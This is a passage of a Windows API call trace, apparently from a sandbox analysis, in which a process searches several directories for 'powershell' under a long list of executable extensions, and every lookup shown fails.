	[0438.360] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.WSH", lpFindFileData=0x1c9ddae0 | out: lpFindFileData=0x1c9ddae0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0438.368] SetErrorMode (uMode=0x1) returned 0x1
	[0438.369] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c9dd940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0438.370] SetErrorMode (uMode=0x1) returned 0x1
	[0438.370] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.MSC", lpFindFileData=0x1c9ddae0 | out: lpFindFileData=0x1c9ddae0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0438.377] SetErrorMode (uMode=0x1) returned 0x1
	[0438.698] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c9dd940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0438.699] SetErrorMode (uMode=0x1) returned 0x1
	[0438.699] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell", lpFindFileData=0x1c9ddae0 | out: lpFindFileData=0x1c9ddae0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0438.707] SetErrorMode (uMode=0x1) returned 0x1
	[0438.708] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c9dd940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0438.708] SetErrorMode (uMode=0x1) returned 0x1
	[0438.708] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.ps1", lpFindFileData=0x1c9ddae0 | out: lpFindFileData=0x1c9ddae0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0438.708] SetErrorMode (uMode=0x1) returned 0x1
	[0438.709] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c9dd940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0438.709] SetErrorMode (uMode=0x1) returned 0x1
	[0438.709] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.psm1", lpFindFileData=0x1c9ddae0 | out: lpFindFileData=0x1c9ddae0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0438.709] SetErrorMode (uMode=0x1) returned 0x1
	[0438.709] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c9dd940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0438.710] SetErrorMode (uMode=0x1) returned 0x1
	[0438.710] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.psd1", lpFindFileData=0x1c9ddae0 | out: lpFindFileData=0x1c9ddae0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0438.710] SetErrorMode (uMode=0x1) returned 0x1
	[0438.710] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c9dd940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0438.710] SetErrorMode (uMode=0x1) returned 0x1
	[0438.710] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.COM", lpFindFileData=0x1c9ddae0 | out: lpFindFileData=0x1c9ddae0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0438.710] SetErrorMode (uMode=0x1) returned 0x1
	[0438.711] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c9dd940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0438.711] SetErrorMode (uMode=0x1) returned 0x1
	[0438.711] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.EXE", lpFindFileData=0x1c9ddae0 | out: lpFindFileData=0x1c9ddae0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0438.711] SetErrorMode (uMode=0x1) returned 0x1
	[0438.711] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c9dd940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0438.711] SetErrorMode (uMode=0x1) returned 0x1
	[0438.711] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.BAT", lpFindFileData=0x1c9ddae0 | out: lpFindFileData=0x1c9ddae0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0438.712] SetErrorMode (uMode=0x1) returned 0x1
	[0438.712] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c9dd940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0438.712] SetErrorMode (uMode=0x1) returned 0x1
	[0438.712] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.CMD", lpFindFileData=0x1c9ddae0 | out: lpFindFileData=0x1c9ddae0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0438.712] SetErrorMode (uMode=0x1) returned 0x1
	[0438.712] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c9dd940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0438.713] SetErrorMode (uMode=0x1) returned 0x1
	[0438.713] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.VBS", lpFindFileData=0x1c9ddae0 | out: lpFindFileData=0x1c9ddae0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0438.713] SetErrorMode (uMode=0x1) returned 0x1
	[0438.713] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c9dd940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0438.713] SetErrorMode (uMode=0x1) returned 0x1
	[0438.713] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.VBE", lpFindFileData=0x1c9ddae0 | out: lpFindFileData=0x1c9ddae0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0438.713] SetErrorMode (uMode=0x1) returned 0x1
	[0438.714] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c9dd940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0438.714] SetErrorMode (uMode=0x1) returned 0x1
	[0438.714] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.JS", lpFindFileData=0x1c9ddae0 | out: lpFindFileData=0x1c9ddae0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0438.714] SetErrorMode (uMode=0x1) returned 0x1
	[0438.714] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c9dd940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0438.714] SetErrorMode (uMode=0x1) returned 0x1
	[0438.714] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.JSE", lpFindFileData=0x1c9ddae0 | out: lpFindFileData=0x1c9ddae0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0438.715] SetErrorMode (uMode=0x1) returned 0x1
	[0438.715] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c9dd940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0438.715] SetErrorMode (uMode=0x1) returned 0x1
	[0438.715] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.WSF", lpFindFileData=0x1c9ddae0 | out: lpFindFileData=0x1c9ddae0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0438.715] SetErrorMode (uMode=0x1) returned 0x1
	[0438.715] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c9dd940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0438.716] SetErrorMode (uMode=0x1) returned 0x1
	[0438.716] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.WSH", lpFindFileData=0x1c9ddae0 | out: lpFindFileData=0x1c9ddae0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0438.716] SetErrorMode (uMode=0x1) returned 0x1
	[0438.716] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c9dd940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0438.716] SetErrorMode (uMode=0x1) returned 0x1
	[0438.716] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.MSC", lpFindFileData=0x1c9ddae0 | out: lpFindFileData=0x1c9ddae0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0438.717] SetErrorMode (uMode=0x1) returned 0x1
	[0438.717] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c9dd940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0438.717] SetErrorMode (uMode=0x1) returned 0x1
	[0438.717] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell", lpFindFileData=0x1c9ddae0 | out: lpFindFileData=0x1c9ddae0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0438.717] SetErrorMode (uMode=0x1) returned 0x1
	[0438.717] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c9dd940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0438.717] SetErrorMode (uMode=0x1) returned 0x1
	[0438.718] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.ps1", lpFindFileData=0x1c9ddae0 | out: lpFindFileData=0x1c9ddae0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0438.718] SetErrorMode (uMode=0x1) returned 0x1
	[0438.718] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c9dd940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0438.718] SetErrorMode (uMode=0x1) returned 0x1
	[0438.718] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.psm1", lpFindFileData=0x1c9ddae0 | out: lpFindFileData=0x1c9ddae0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0438.718] SetErrorMode (uMode=0x1) returned 0x1
	[0438.719] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c9dd940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0438.719] SetErrorMode (uMode=0x1) returned 0x1
	[0438.719] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.psd1", lpFindFileData=0x1c9ddae0 | out: lpFindFileData=0x1c9ddae0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0438.719] SetErrorMode (uMode=0x1) returned 0x1
	[0438.719] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c9dd940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0438.719] SetErrorMode (uMode=0x1) returned 0x1
	[0438.719] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.COM", lpFindFileData=0x1c9ddae0 | out: lpFindFileData=0x1c9ddae0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0438.720] SetErrorMode (uMode=0x1) returned 0x1
	[0438.720] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c9dd940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0438.720] SetErrorMode (uMode=0x1) returned 0x1
	[0438.720] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.EXE", lpFindFileData=0x1c9ddae0 | out: lpFindFileData=0x1c9ddae0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0438.720] SetErrorMode (uMode=0x1) returned 0x1
	[0438.720] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c9dd940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0438.721] SetErrorMode (uMode=0x1) returned 0x1
	[0438.721] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.BAT", lpFindFileData=0x1c9ddae0 | out: lpFindFileData=0x1c9ddae0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0438.721] SetErrorMode (uMode=0x1) returned 0x1
	[0438.721] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c9dd940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0438.721] SetErrorMode (uMode=0x1) returned 0x1
	[0438.721] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.CMD", lpFindFileData=0x1c9ddae0 | out: lpFindFileData=0x1c9ddae0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0438.722] SetErrorMode (uMode=0x1) returned 0x1
	[0438.722] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c9dd940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0438.722] SetErrorMode (uMode=0x1) returned 0x1
	[0438.722] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.VBS", lpFindFileData=0x1c9ddae0 | out: lpFindFileData=0x1c9ddae0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0438.722] SetErrorMode (uMode=0x1) returned 0x1
	[0438.722] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c9dd940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0438.722] SetErrorMode (uMode=0x1) returned 0x1
	[0438.723] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.VBE", lpFindFileData=0x1c9ddae0 | out: lpFindFileData=0x1c9ddae0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0438.723] SetErrorMode (uMode=0x1) returned 0x1
	[0438.723] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c9dd940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0438.723] SetErrorMode (uMode=0x1) returned 0x1
	[0438.723] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.JS", lpFindFileData=0x1c9ddae0 | out: lpFindFileData=0x1c9ddae0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0438.723] SetErrorMode (uMode=0x1) returned 0x1
	[0438.723] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c9dd940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0438.724] SetErrorMode (uMode=0x1) returned 0x1
	[0438.724] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.JSE", lpFindFileData=0x1c9ddae0 | out: lpFindFileData=0x1c9ddae0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0438.724] SetErrorMode (uMode=0x1) returned 0x1
	[0438.724] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c9dd940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0438.724] SetErrorMode (uMode=0x1) returned 0x1
	[0438.724] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.WSF", lpFindFileData=0x1c9ddae0 | out: lpFindFileData=0x1c9ddae0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0438.725] SetErrorMode (uMode=0x1) returned 0x1
	[0438.725] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c9dd940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0438.725] SetErrorMode (uMode=0x1) returned 0x1
	[0438.725] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.WSH", lpFindFileData=0x1c9ddae0 | out: lpFindFileData=0x1c9ddae0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0438.725] SetErrorMode (uMode=0x1) returned 0x1
